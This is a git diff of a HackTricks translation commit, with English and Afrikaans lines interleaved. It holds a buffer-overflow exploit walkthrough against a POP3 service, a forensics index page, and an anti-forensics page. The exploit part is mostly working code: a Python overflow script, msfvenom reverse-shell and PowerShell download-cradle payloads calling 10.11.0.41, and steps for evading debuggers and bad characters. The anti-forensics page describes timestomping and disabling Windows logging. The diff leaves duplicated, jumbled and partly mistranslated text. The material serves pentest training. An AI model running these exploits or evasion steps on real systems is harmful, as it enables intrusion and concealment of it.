Hierdie is 'n baie basiese sjabloon vir 'n Python-uitbuiting. Jy kan die waardes van `target_ip` en `target_port` verander om die IP-adres en poortnommer van die teiken te spesifiseer. Vervang die `exploit_string` met die spesifieke uitbuitingsstring wat jy wil stuur. Die program sal die uitbuitingsstring na die teiken stuur en die antwoord ontvang en druk.
```python
#!/usr/bin/python
@ -39,99 +65,89 @@ port = 110
buffer = 'A' * 2700
try:
print "\nLaunching exploit..."
s.connect((ip, port))
data = s.recv(1024)
s.send('USER username' +'\r\n')
data = s.recv(1024)
s.send('PASS ' + buffer + '\r\n')
print "\nFinished!."
print "\nLaunching exploit..."
s.connect((ip, port))
data = s.recv(1024)
s.send('USER username' +'\r\n')
data = s.recv(1024)
s.send('PASS ' + buffer + '\r\n')
print "\nFinished!."
except:
print "Could not connect to "+ip+":"+port
print "Could not connect to "+ip+":"+port
```
## **Verander Immunity Debugger-lettertipe**
## **Change Immunity Debugger Font**
Gaan na `Options >> Appearance >> Fonts >> Change(Consolas, Blod, 9) >> OK`
Go to `Options >> Appearance >> Fonts >> Change(Consolas, Blod, 9) >> OK`
## **Attach the proces to Immunity Debugger:**
## **Koppel die proses aan Immunity Debugger:**
**File --> Attach**
![](<../.gitbook/assets/image (24) (1) (1).png>)
**And press START button**
**En druk die START-knoppie**
## **Send the exploit and check if EIP is affected:**
## **Stuur die uitbuit en kyk of EIP geraak word:**
![](<../.gitbook/assets/image (25) (1) (1).png>)
Every time you break the service you should restart it as is indicated in the beginnig of this page.
Elke keer as jy die diens breek, moet jy dit herbegin soos aangedui aan die begin van hierdie bladsy.
## Create a pattern to modify the EIP
## Skep 'n patroon om die EIP te wysig
The pattern should be as big as the buffer you used to broke the service previously.
Die patroon moet so groot wees as die buffer wat jy vantevore gebruik het om die diens te breek.
![](<../.gitbook/assets/image (26) (1) (1).png>)
```
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000
```
Verander die buffer van die uitbuit en stel die patroon in en voer die uitbuit uit.
Change the buffer of the exploit and set the pattern and lauch the exploit.
A new crash should appeard, but with a different EIP address:
'n Nuwe crash moet verskyn, maar met 'n ander EIP-adres:
![](<../.gitbook/assets/image (27) (1) (1).png>)
Check if the address was in your pattern:
Kyk of die adres in jou patroon was:
![](<../.gitbook/assets/image (28) (1) (1).png>)
```
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 39694438
```
Lyk asof **ons die EIP in offset 2606 kan wysig** van die buffer.
Looks like **we can modify the EIP in offset 2606** of the buffer.
Check it modifing the buffer of the exploit:
Kyk daarna deur die buffer van die aanval te wysig:
```
buffer = 'A'*2606 + 'BBBB' + 'CCCC'
```
With this buffer the EIP crashed should point to 42424242 ("BBBB")
Met hierdie buffer moet die EIP-gekraakte punt na 42424242 ("BBBB") wys.
![](<../.gitbook/assets/image (30) (1) (1).png>)
![](<../.gitbook/assets/image (29) (1) (1).png>)
Looks like it is working.
Dit lyk asof dit werk.
## Check for Shellcode space inside the stack
## Kontroleer vir Shellcode-ruimte binne die stapel
600B should be enough for any powerfull shellcode.
Lets change the bufer:
600B moet genoeg wees vir enige kragtige shellcode.
Laat ons die buffer verander:
```
buffer = 'A'*2606 + 'BBBB' + 'C'*600
```
launch the new exploit and check the EBP and the length of the usefull shellcode
Begin deur die nuwe uitbuiting te begin en die EBP en lengte van die bruikbare skuldkode te kontroleer.
![](<../.gitbook/assets/image (31) (1).png>)
![](<../.gitbook/assets/image (32) (1).png>)
You can see that when the vulnerability is reached, the EBP is pointing to the shellcode and that we have a lot of space to locate a shellcode here.
Jy kan sien dat wanneer die kwesbaarheid bereik word, wys die EBP na die skuldkode en dat ons baie spasie het om 'n skuldkode hier te plaas.
In this case we have **from 0x0209A128 to 0x0209A2D6 = 430B.** Enough.
In hierdie geval het ons **vanaf 0x0209A128 tot 0x0209A2D6 = 430B.** Genoeg.
## Check for bad chars
Change again the buffer:
## Kontroleer vir slegte karakters
Verander weer die buffer:
```
badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
@ -153,30 +169,27 @@ badchars = (
)
buffer = 'A'*2606 + 'BBBB' + badchars
```
Die slegte karakters begin by 0x01 omdat 0x00 amper altyd sleg is.
The badchars starts in 0x01 because 0x00 is almost always bad.
Voer die aanval herhaaldelik uit met hierdie nuwe buffer deur die karakters wat nutteloos is, te verwyder:
Execute repeatedly the exploit with this new buffer delenting the chars that are found to be useless:.
Byvoorbeeld:
For example:
In this case you can see that **you shouldn't use the char 0x0A** (nothing is saved in memory since the char 0x09).
In hierdie geval kan jy sien dat **jy nie die karakter 0x0A moet gebruik nie** (niks word in die geheue gestoor aangesien die karakter 0x09 is).
![](<../.gitbook/assets/image (33) (1).png>)
In this case you can see that **the char 0x0D is avoided**:
In hierdie geval kan jy sien dat **die karakter 0x0D vermy word**:
![](<../.gitbook/assets/image (34) (1).png>)
## Find a JMP ESP as a return address
Using:
## Vind 'n JMP ESP as 'n terugkeeradres
Gebruik:
```
!mona modules #Get protections, look for all false except last one (Dll of SO)
```
You will **list the memory maps**. Search for some DLl that has:
Jy sal die geheuekaarte lys. Soek na 'n paar DLL's wat die volgende eienskappe het:
* **Rebase: False**
* **SafeSEH: False**
@ -186,30 +199,25 @@ You will **list the memory maps**. Search for some DLl that has:
![](<../.gitbook/assets/image (35) (1).png>)
Now, inside this memory you should find some JMP ESP bytes, to do that execute:
Nou, binne hierdie geheue moet jy 'n paar JMP ESP-bytes vind. Om dit te doen, voer die volgende uit:
```
!mona find -s "\xff\xe4" -m name_unsecure.dll # Search for opcodes insie dll space (JMP ESP)
!mona find -s "\xff\xe4" -m slmfc.dll # Example in this case
```
**Then, if some address is found, choose one that don't contain any badchar:**
**Dan, as 'n adres gevind word, kies een wat geen slegte karakters bevat nie:**
![](<../.gitbook/assets/image (36) (1).png>)
**In this case, for example: \_0x5f4a358f**\_
## Create shellcode
**In hierdie geval, byvoorbeeld: \_0x5f4a358f**\_
## Skep shellcode
```
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.41 LPORT=443 -f c -b '\x00\x0a\x0d'
msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://10.11.0.41/nishang.ps1')\"" -f python -b '\x00\x0a\x0d'
```
As die uitbuit nie werk nie, maar dit moet (jy kan sien met ImDebg dat die shellcode bereik word), probeer om ander shellcodes te skep (msfvenom sal verskillende shellcodes skep vir dieselfde parameters).
If the exploit is not working but it should (you can see with ImDebg that the shellcode is reached), try to create other shellcodes (msfvenom with create different shellcodes for the same parameters).
**Add some NOPS at the beginning** of the shellcode and use it and the return address to JMP ESP, and finish the exploit:
**Voeg 'n paar NOPS aan die begin** van die shellcode by en gebruik dit en die terugkeeradres om te JMP ESP, en voltooi die uitbuit:
```bash
#!/usr/bin/python
@ -248,39 +256,36 @@ shellcode = (
buffer = 'A' * 2606 + '\x8f\x35\x4a\x5f' + "\x90" * 8 + shellcode
try:
print "\nLaunching exploit..."
s.connect((ip, port))
data = s.recv(1024)
s.send('USER username' +'\r\n')
data = s.recv(1024)
s.send('PASS ' + buffer + '\r\n')
print "\nFinished!."
print "\nLaunching exploit..."
s.connect((ip, port))
data = s.recv(1024)
s.send('USER username' +'\r\n')
data = s.recv(1024)
s.send('PASS ' + buffer + '\r\n')
print "\nFinished!."
except:
print "Could not connect to "+ip+":"+port
print "Could not connect to "+ip+":"+port
```
{% hint style="warning" %}
There are shellcodes that will **overwrite themselves**, therefore it's important to always add some NOPs before the shellcode
Daar is shellcodes wat **hulself sal oorskryf**, daarom is dit belangrik om altyd 'n paar NOPs voor die shellcode by te voeg.
{% endhint %}
## Improving the shellcode
Add this parameters:
## Verbetering van die shellcode
Voeg hierdie parameters by:
```
EXITFUNC=thread -e x86/shikata_ga_nai
```
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>

56
forensics/basic-forensic-methodology/README.md
View file

@ -1,40 +1,40 @@
# Basic Forensic Methodology
# Basiese Forensiese Metodologie
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
</details>
## Creating and Mounting an Image
## Skep en Monteer 'n Beeld
{% content-ref url="../../generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md" %}
[image-acquisition-and-mount.md](../../generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md)
{% endcontent-ref %}
## Malware Analysis
## Malware-analise
This **isn't necessary the first step to perform once you have the image**. But you can use this malware analysis techniques independently if you have a file, a file-system image, memory image, pcap... so it's good to **keep these actions in mind**:
Dit is **nie noodwendig die eerste stap om uit te voer nadat jy die beeld het nie**. Maar jy kan hierdie malware-analise tegnieke onafhanklik gebruik as jy 'n lêer, 'n lêerstelselbeeld, geheuebeeld, pcap... het, so dit is goed om **hierdie aksies in gedagte te hou**:
{% content-ref url="malware-analysis.md" %}
[malware-analysis.md](malware-analysis.md)
{% endcontent-ref %}
## Inspecting an Image
## Inspekteer 'n Beeld
if you are given a **forensic image** of a device you can start **analyzing the partitions, file-system** used and **recovering** potentially **interesting files** (even deleted ones). Learn how in:
As jy 'n **forensiese beeld** van 'n toestel gekry het, kan jy begin **analiseer die partisies, lêerstelsel** wat gebruik word en **herwin** potensieel **interessante lêers** (selfs uitgewisde lêers). Leer hoe om dit te doen:
{% content-ref url="partitions-file-systems-carving/" %}
[partitions-file-systems-carving](partitions-file-systems-carving/)
{% endcontent-ref %}
Depending on the used OSs and even platform different interesting artifacts should be searched:
Afhanklik van die gebruikte bedryfstelsels en selfs platforms moet verskillende interessante artefakte gesoek word:
{% content-ref url="windows-forensics/" %}
[windows-forensics](windows-forensics/)
@ -48,42 +48,42 @@ Depending on the used OSs and even platform different interesting artifacts shou
[docker-forensics.md](docker-forensics.md)
{% endcontent-ref %}
## Deep inspection of specific file-types and Software
## Diep inspeksie van spesifieke lêertipes en sagteware
If you have very **suspicious** **file**, then **depending on the file-type and software** that created it several **tricks** may be useful.\
Read the following page to learn some interesting tricks:
As jy 'n baie **verdagte lêer** het, dan kan verskeie **truuks** nuttig wees, afhangende van die lêertipe en sagteware wat dit geskep het.\
Lees die volgende bladsy om 'n paar interessante truuks te leer:
{% content-ref url="specific-software-file-type-tricks/" %}
[specific-software-file-type-tricks](specific-software-file-type-tricks/)
{% endcontent-ref %}
I want to do a special mention to the page:
Ek wil 'n spesiale vermelding maak van die bladsy:
{% content-ref url="specific-software-file-type-tricks/browser-artifacts.md" %}
[browser-artifacts.md](specific-software-file-type-tricks/browser-artifacts.md)
{% endcontent-ref %}
## Memory Dump Inspection
## Geheue-uitstorting-inspeksie
{% content-ref url="memory-dump-analysis/" %}
[memory-dump-analysis](memory-dump-analysis/)
{% endcontent-ref %}
## Pcap Inspection
## Pcap-inspeksie
{% content-ref url="pcap-inspection/" %}
[pcap-inspection](pcap-inspection/)
{% endcontent-ref %}
## **Anti-Forensic Techniques**
## **Anti-Forensiese Tegnieke**
Keep in mind the possible use of anti-forensic techniques:
Hou moontlike gebruik van anti-forensiese tegnieke in gedagte:
{% content-ref url="anti-forensic-techniques.md" %}
[anti-forensic-techniques.md](anti-forensic-techniques.md)
{% endcontent-ref %}
## Threat Hunting
## Bedreigingsjag
{% content-ref url="file-integrity-monitoring.md" %}
[file-integrity-monitoring.md](file-integrity-monitoring.md)
@ -91,12 +91,12 @@ Keep in mind the possible use of anti-forensic techniques:
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
</details>

176
forensics/basic-forensic-methodology/anti-forensic-techniques.md
View file

@ -1,181 +1,173 @@
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
</details>
# Timestamps
# Tydstempels
An attacker may be interested in **changing the timestamps of files** to avoid being detected.\
It's possible to find the timestamps inside the MFT in attributes `$STANDARD_INFORMATION` __ and __ `$FILE_NAME`.
'n Aanvaller mag belangstel om die tydstempels van lêers te **verander** om opsporing te vermy.\
Dit is moontlik om die tydstempels binne die MFT in eienskappe `$STANDARD_INFORMATION` __ en __ `$FILE_NAME` te vind.
Both attributes have 4 timestamps: **Modification**, **access**, **creation**, and **MFT registry modification** (MACE or MACB).
Beide eienskappe het 4 tydstempels: **Wysiging**, **toegang**, **skepping**, en **MFT-registervoortgangswysiging** (MACE of MACB).
**Windows explorer** and other tools show the information from **`$STANDARD_INFORMATION`**.
**Windows verkenner** en ander gereedskap wys die inligting vanaf **`$STANDARD_INFORMATION`**.
## TimeStomp - Anti-forensic Tool
## TimeStomp - Anti-forensiese Gereedskap
This tool **modifies** the timestamp information inside **`$STANDARD_INFORMATION`** **but** **not** the information inside **`$FILE_NAME`**. Therefore, it's possible to **identify** **suspicious** **activity**.
Hierdie gereedskap **verander** die tydstempelinligting binne **`$STANDARD_INFORMATION`** **maar nie** die inligting binne **`$FILE_NAME`** nie. Daarom is dit moontlik om **verdagte aktiwiteit te identifiseer**.
## Usnjrnl
The **USN Journal** (Update Sequence Number Journal) is a feature of the NTFS (Windows NT file system) that keeps track of volume changes. The [**UsnJrnl2Csv**](https://github.com/jschicht/UsnJrnl2Csv) tool allows for the examination of these changes.
Die **USN Joernaal** (Update Sequence Number Journal) is 'n kenmerk van die NTFS (Windows NT-lêersisteem) wat volume-veranderinge byhou. Die [**UsnJrnl2Csv**](https://github.com/jschicht/UsnJrnl2Csv) gereedskap maak dit moontlik om hierdie veranderinge te ondersoek.
![](<../../.gitbook/assets/image (449).png>)
The previous image is the **output** shown by the **tool** where it can be observed that some **changes were performed** to the file.
Die vorige prentjie is die **uitset** wat deur die **gereedskap** gewys word waar dit waargeneem kan word dat sommige **veranderinge aan die lêer uitgevoer is**.
## $LogFile
**All metadata changes to a file system are logged** in a process known as [write-ahead logging](https://en.wikipedia.org/wiki/Write-ahead_logging). The logged metadata is kept in a file named `**$LogFile**`, located in the root directory of an NTFS file system. Tools such as [LogFileParser](https://github.com/jschicht/LogFileParser) can be used to parse this file and identify changes.
**Alle metadata-veranderinge aan 'n lêersisteem word gelog** in 'n proses wat bekend staan as [write-ahead logging](https://en.wikipedia.org/wiki/Write-ahead_logging). Die gelogde metadata word in 'n lêer genaamd `**$LogFile**` gehou, wat in die hoofgids van 'n NTFS-lêersisteem geleë is. Gereedskap soos [LogFileParser](https://github.com/jschicht/LogFileParser) kan gebruik word om hierdie lêer te ontled en veranderinge te identifiseer.
![](<../../.gitbook/assets/image (450).png>)
Again, in the output of the tool it's possible to see that **some changes were performed**.
Weereens, in die uitset van die gereedskap is dit moontlik om te sien dat **sommige veranderinge uitgevoer is**.
Using the same tool it's possible to identify to **which time the timestamps were modified**:
Met dieselfde gereedskap is dit moontlik om te identifiseer **watter tyd die tydstempels verander is**:
![](<../../.gitbook/assets/image (451).png>)
* CTIME: File's creation time
* ATIME: File's modification time
* MTIME: File's MFT registry modification
* RTIME: File's access time
* CTIME: Lêer se skeppingstyd
* ATIME: Lêer se wysigingstyd
* MTIME: Lêer se MFT-registervoortgangswysiging
* RTIME: Lêer se toegangstyd
## `$STANDARD_INFORMATION` and `$FILE_NAME` comparison
## Vergelyking van `$STANDARD_INFORMATION` en `$FILE_NAME`
Another way to identify suspicious modified files would be to compare the time on both attributes looking for **mismatches**.
'n Ander manier om verdagte gewysigde lêers te identifiseer, sou wees om die tyd in beide eienskappe te vergelyk en te soek na **verskille**.
## Nanoseconds
## Nanosekondes
**NTFS** timestamps have a **precision** of **100 nanoseconds**. Then, finding files with timestamps like 2010-10-10 10:10:**00.000:0000 is very suspicious**.
**NTFS**-tydstempels het 'n **presisie** van **100 nanosekondes**. Om dan lêers met tydstempels soos 2010-10-10 10:10:**00.000:0000 te vind, is baie verdag**.
## SetMace - Anti-forensic Tool
## SetMace - Anti-forensiese Gereedskap
This tool can modify both attributes `$STARNDAR_INFORMATION` and `$FILE_NAME`. However, from Windows Vista, it's necessary for a live OS to modify this information.
Hierdie gereedskap kan beide eienskappe `$STARNDAR_INFORMATION` en `$FILE_NAME` verander. Vanaf Windows Vista is dit egter nodig vir 'n lewendige bedryfstelsel om hierdie inligting te verander.
# Data Hiding
# Data Versteek
NFTS uses a cluster and the minimum information size. That means that if a file occupies uses and cluster and a half, the **reminding half is never going to be used** until the file is deleted. Then, it's possible to **hide data in this slack space**.
NFTS gebruik 'n groep en die minimum inligtingsgrootte. Dit beteken dat as 'n lêer 'n groep en 'n half gebruik, sal die **oorskietende helfte nooit gebruik word nie** totdat die lêer uitgevee word. Dit is dan moontlik om data in hierdie "verborge" spasie te **versteek**.
There are tools like slacker that allow hiding data in this "hidden" space. However, an analysis of the `$logfile` and `$usnjrnl` can show that some data was added:
Daar is gereedskap soos slacker wat dit moontlik maak om data in hierdie "verborge" spasie te versteek. 'n Ontleding van die `$logfile` en `$usnjrnl` kan egter wys dat daar data bygevoeg is:
![](<../../.gitbook/assets/image (452).png>)
Then, it's possible to retrieve the slack space using tools like FTK Imager. Note that this kind of tool can save the content obfuscated or even encrypted.
Dit is dan moontlik om die spasie te herwin deur gereedskap soos FTK Imager te gebruik. Let daarop dat hierdie soort gereedskap die inhoud geobskureer of selfs versleutel kan stoor.
# UsbKill
This is a tool that will **turn off the computer if any change in the USB** ports is detected.\
A way to discover this would be to inspect the running processes and **review each python script running**.
Dit is 'n gereedskap wat die rekenaar sal **afskakel as enige verandering in die USB-poorte** opgespoor word.\
'n Manier om dit te ontdek sou wees om die lopende prosesse te ondersoek en **elke python-skripsie wat loop te hersien**.
# Live Linux Distributions
# Lewende Linux-verspreidings
These distros are **executed inside the RAM** memory. The only way to detect them is **in case the NTFS file-system is mounted with write permissions**. If it's mounted just with read permissions it won't be possible to detect the intrusion.
Hierdie verspreidings word **uitgevoer binne die RAM-geheue**. Die enigste manier om hulle op te spoor is **as die NTFS-lêersisteem met skryfregte aangeheg is**. As dit net met leesregte aangeheg is, sal dit nie moontlik wees om die indringing op te spoor nie.
# Secure Deletion
# Veilige Skrapping
[https://github.com/Claudio-C/awesome-data-sanitization](https://github.com/Claudio-C/awesome-data-sanitization)
# Windows Configuration
# Windows-konfigurasie
It's possible to disable several windows logging methods to make the forensics investigation much harder.
Dit is moontlik om verskeie Windows-loggingsmetodes uit te skakel om die forensiese ondersoek baie moeiliker te maak.
## Disable Timestamps - UserAssist
## Skakel Tydstempels Af - UserAssist
This is a registry key that maintains dates and hours when each executable was run by the user.
Dit is 'n registerleutel wat datums en ure behou wanneer elke uitvoerbare lêer deur die gebruiker uitgevoer is.
Disabling UserAssist requires two steps:
Om UserAssist uit te skakel, is twee stappe nodig:
1. Set two registry keys, `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs` and `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackEnabled`, both to zero in order to signal that we want UserAssist disabled.
2. Clear your registry subtrees that look like `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\<hash>`.
1. Stel twee registerleutels, `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs` en `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackEnabled`, beide op nul om aan te dui dat ons UserAssist wil uitskakel.
2. Wis jou register-subbome wat lyk soos `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\<hash>`.
## Disable Timestamps - Prefetch
## Skakel Tydstempels Af - Prefetch
This will save information about the applications executed with the goal of improving the performance of the Windows system. However, this can also be useful for forensics practices.
Dit sal inligting oor die uitgevoerde toepassings stoor met die doel om die prestasie van die Windows-stelsel te verbeter. Dit kan egter ook nuttig wees vir forensiese praktyke.
* Execute `regedit`
* Select the file path `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\Memory Management\PrefetchParameters`
* Right-click on both `EnablePrefetcher` and `EnableSuperfetch`
* Select Modify on each of these to change the value from 1 (or 3) to 0
* Restart
* Voer `regedit` uit
* Kies die lêerpad `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\Memory Management\PrefetchParameters`
* Regskliek op beide `EnablePrefetcher` en `EnableSuperfetch`
* Kies Wysig op elkeen van hierdie om die waarde van 1 (of 3) na 0 te verander
* Herlaai
## Disable Timestamps - Last Access Time
## Skakel Tydstempels Af - Laaste Toegangstyd
Whenever a folder is opened from an NTFS volume on a Windows NT server, the system takes the time to **update a timestamp field on each listed folder**, called the last access time. On a heavily used NTFS volume, this can affect performance.
Telkens wanneer 'n gids vanaf 'n NTFS-volume op 'n Windows NT-bediener geopen word, neem die stelsel die tyd om 'n tydstempelveld op elke gelysde gids op te dateer, genaamd die laaste toegangstyd. Op 'n baie gebruikte NTFS-volume kan dit die prestasie beïnvloed.
1. Open the Registry Editor (Regedit.exe).
2. Browse to `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem`.
3. Look for `NtfsDisableLastAccessUpdate`. If it doesnt exist, add this DWORD and set its value to 1, which will disable the process.
4. Close the Registry Editor, and reboot the server.
1. Maak die Registerredigeerder (Regedit
## Verwyder USB Geskiedenis
## Delete USB History
Al die **USB-toestelinskrywings** word gestoor in die Windows-registreerder onder die **USBSTOR**-registreersleutel wat sub-sleutels bevat wat geskep word wanneer jy 'n USB-toestel in jou rekenaar of draagbare rekenaar steek. Jy kan hierdie sleutel vind by H`KEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`. **Deur dit te verwyder**, sal jy die USB-geskiedenis verwyder.\
